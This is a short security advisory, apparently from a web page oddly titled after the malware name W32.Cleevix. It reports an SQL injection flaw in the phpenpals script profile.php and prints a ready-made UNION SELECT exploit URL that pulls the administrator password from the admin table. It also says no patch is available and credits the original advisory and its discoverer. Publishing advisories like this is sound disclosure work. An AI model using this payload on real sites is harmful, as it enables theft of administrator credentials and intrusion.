Ads

W32.Cleevix PDF Print E-mail
Wednesday, 04 January 2006
Vulnerable scripts:
profile.php

Variable $personalID isnt properly sanitized before being used in a
SQL query. This can be used to make any SQL query by injecting arbitrary
SQL code.


--------------Exploit---------------------
Administrators password:
http://host/phpenpals/profile.php?personalID=999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,password,14%20from%20admin/*

--------------Solution---------------------
No Patch available.

--------------Credit---------------------
Original Advisory:
http://evuln.com/vulns/5/summary.html

Discovered by: Aliaksandr Hartsuyeu ( This email address is being protected from spam bots, you need Javascript enabled to view it )
 
< Prev   Next >